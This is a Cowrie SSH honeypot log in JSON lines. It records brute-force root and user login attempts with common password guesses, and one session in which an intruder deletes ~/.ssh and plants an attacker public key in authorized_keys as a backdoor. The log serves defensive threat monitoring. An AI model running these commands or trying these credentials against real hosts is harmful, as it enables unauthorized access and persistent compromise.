{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:21:52.488557Z","src_ip":"192.210.135.20","session":"5f7bf1d8dac8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:21:52.602623Z","src_ip":"192.210.135.20","session":"5f7bf1d8dac8"}
{"eventid":"cowrie.login.failed","username":"nagios","password":"password123","message":"login attempt [nagios/password123] failed","sensor":"my-vps","timestamp":"2025-09-09T04:21:53.080678Z","src_ip":"192.210.135.20","session":"5f7bf1d8dac8"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T04:21:53.665302Z","src_ip":"103.59.95.12","session":"b416d3cffa0b"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:21:54.192286Z","src_ip":"192.210.135.20","session":"5f7bf1d8dac8"}
{"eventid":"cowrie.session.closed","duration":"4.1","message":"Connection lost after 4.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:21:55.369545Z","src_ip":"103.59.95.12","session":"b416d3cffa0b"}
{"eventid":"cowrie.session.connect","src_ip":"103.59.95.12","src_port":43986,"dst_ip":"1.2.3.4","dst_port":22,"session":"6abe274307dc","protocol":"ssh","message":"New connection: 103.59.95.12:43986 (1.2.3.4:22) [session: 6abe274307dc]","sensor":"my-vps","timestamp":"2025-09-09T04:21:55.637837Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:21:55.640230Z","src_ip":"103.59.95.12","session":"6abe274307dc"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:21:55.910516Z","src_ip":"103.59.95.12","session":"6abe274307dc"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T04:21:57.034625Z","src_ip":"103.59.95.12","session":"6abe274307dc"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:21:57.305568Z","src_ip":"103.59.95.12","session":"6abe274307dc"}
{"eventid":"cowrie.session.closed","duration":"10.2","message":"Connection lost after 10.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:21:57.306740Z","src_ip":"103.59.95.12","session":"f7d681144f73"}
{"eventid":"cowrie.session.connect","src_ip":"154.209.4.55","src_port":51152,"dst_ip":"1.2.3.4","dst_port":22,"session":"18748e2b5225","protocol":"ssh","message":"New connection: 154.209.4.55:51152 (1.2.3.4:22) [session: 18748e2b5225]","sensor":"my-vps","timestamp":"2025-09-09T04:22:00.346885Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:22:00.355695Z","src_ip":"154.209.4.55","session":"18748e2b5225"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:22:00.557389Z","src_ip":"154.209.4.55","session":"18748e2b5225"}
{"eventid":"cowrie.login.failed","username":"data","password":"Password123","message":"login attempt [data/Password123] failed","sensor":"my-vps","timestamp":"2025-09-09T04:22:01.374361Z","src_ip":"154.209.4.55","session":"18748e2b5225"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:22:02.583277Z","src_ip":"154.209.4.55","session":"18748e2b5225"}
{"eventid":"cowrie.session.connect","src_ip":"211.22.25.164","src_port":45930,"dst_ip":"1.2.3.4","dst_port":22,"session":"5f742332b56a","protocol":"ssh","message":"New connection: 211.22.25.164:45930 (1.2.3.4:22) [session: 5f742332b56a]","sensor":"my-vps","timestamp":"2025-09-09T04:22:03.679714Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:22:03.680957Z","src_ip":"211.22.25.164","session":"5f742332b56a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:22:03.921635Z","src_ip":"211.22.25.164","session":"5f742332b56a"}
{"eventid":"cowrie.login.failed","username":"z","password":"password","message":"login attempt [z/password] failed","sensor":"my-vps","timestamp":"2025-09-09T04:22:04.921288Z","src_ip":"211.22.25.164","session":"5f742332b56a"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:22:06.164216Z","src_ip":"211.22.25.164","session":"5f742332b56a"}
{"eventid":"cowrie.session.connect","src_ip":"102.68.86.62","src_port":36478,"dst_ip":"1.2.3.4","dst_port":22,"session":"2262fd899084","protocol":"ssh","message":"New connection: 102.68.86.62:36478 (1.2.3.4:22) [session: 2262fd899084]","sensor":"my-vps","timestamp":"2025-09-09T04:22:22.348058Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:22:22.348955Z","src_ip":"102.68.86.62","session":"2262fd899084"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:22:22.517188Z","src_ip":"102.68.86.62","session":"2262fd899084"}
{"eventid":"cowrie.login.failed","username":"nexus","password":"1","message":"login attempt [nexus/1] failed","sensor":"my-vps","timestamp":"2025-09-09T04:22:23.231570Z","src_ip":"102.68.86.62","session":"2262fd899084"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:22:24.402306Z","src_ip":"102.68.86.62","session":"2262fd899084"}
{"eventid":"cowrie.session.connect","src_ip":"51.81.118.153","src_port":50634,"dst_ip":"1.2.3.4","dst_port":22,"session":"beba0ad75050","protocol":"ssh","message":"New connection: 51.81.118.153:50634 (1.2.3.4:22) [session: beba0ad75050]","sensor":"my-vps","timestamp":"2025-09-09T04:22:27.274622Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:22:27.275757Z","src_ip":"51.81.118.153","session":"beba0ad75050"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:22:27.372541Z","src_ip":"51.81.118.153","session":"beba0ad75050"}
{"eventid":"cowrie.login.failed","username":"usertest","password":"1234567890","message":"login attempt [usertest/1234567890] failed","sensor":"my-vps","timestamp":"2025-09-09T04:22:27.798797Z","src_ip":"51.81.118.153","session":"beba0ad75050"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:22:28.897254Z","src_ip":"51.81.118.153","session":"beba0ad75050"}
{"eventid":"cowrie.session.connect","src_ip":"152.32.190.168","src_port":38602,"dst_ip":"1.2.3.4","dst_port":22,"session":"87cb2ee20663","protocol":"ssh","message":"New connection: 152.32.190.168:38602 (1.2.3.4:22) [session: 87cb2ee20663]","sensor":"my-vps","timestamp":"2025-09-09T04:22:31.886320Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:22:31.887231Z","src_ip":"152.32.190.168","session":"87cb2ee20663"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:22:32.144192Z","src_ip":"152.32.190.168","session":"87cb2ee20663"}
{"eventid":"cowrie.login.failed","username":"tester","password":"tester@2025","message":"login attempt [tester/tester@2025] failed","sensor":"my-vps","timestamp":"2025-09-09T04:22:33.214366Z","src_ip":"152.32.190.168","session":"87cb2ee20663"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:22:34.475235Z","src_ip":"152.32.190.168","session":"87cb2ee20663"}
{"eventid":"cowrie.session.connect","src_ip":"192.210.135.20","src_port":42000,"dst_ip":"1.2.3.4","dst_port":22,"session":"b658da915794","protocol":"ssh","message":"New connection: 192.210.135.20:42000 (1.2.3.4:22) [session: b658da915794]","sensor":"my-vps","timestamp":"2025-09-09T04:22:51.868834Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:22:51.870212Z","src_ip":"192.210.135.20","session":"b658da915794"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:22:51.979702Z","src_ip":"192.210.135.20","session":"b658da915794"}
{"eventid":"cowrie.login.failed","username":"public","password":"Welcome1","message":"login attempt [public/Welcome1] failed","sensor":"my-vps","timestamp":"2025-09-09T04:22:52.464192Z","src_ip":"192.210.135.20","session":"b658da915794"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:22:53.574790Z","src_ip":"192.210.135.20","session":"b658da915794"}
{"eventid":"cowrie.session.connect","src_ip":"154.209.4.55","src_port":35728,"dst_ip":"1.2.3.4","dst_port":22,"session":"c3d155c5ac64","protocol":"ssh","message":"New connection: 154.209.4.55:35728 (1.2.3.4:22) [session: c3d155c5ac64]","sensor":"my-vps","timestamp":"2025-09-09T04:23:07.874866Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:23:07.884421Z","src_ip":"154.209.4.55","session":"c3d155c5ac64"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:23:08.087467Z","src_ip":"154.209.4.55","session":"c3d155c5ac64"}
{"eventid":"cowrie.login.success","username":"root","password":"poiuytrewq","message":"login attempt [root/poiuytrewq] succeeded","sensor":"my-vps","timestamp":"2025-09-09T04:23:08.916137Z","src_ip":"154.209.4.55","session":"c3d155c5ac64"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:23:09.401345Z","src_ip":"154.209.4.55","session":"c3d155c5ac64"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T04:23:09.402018Z","src_ip":"154.209.4.55","session":"c3d155c5ac64"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T04:23:09.403095Z","src_ip":"154.209.4.55","session":"c3d155c5ac64"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:23:09.614431Z","src_ip":"154.209.4.55","session":"c3d155c5ac64"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:23:10.080873Z","src_ip":"154.209.4.55","session":"c3d155c5ac64"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T04:23:10.081542Z","src_ip":"154.209.4.55","session":"c3d155c5ac64"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T04:23:10.292905Z","src_ip":"154.209.4.55","session":"c3d155c5ac64"}
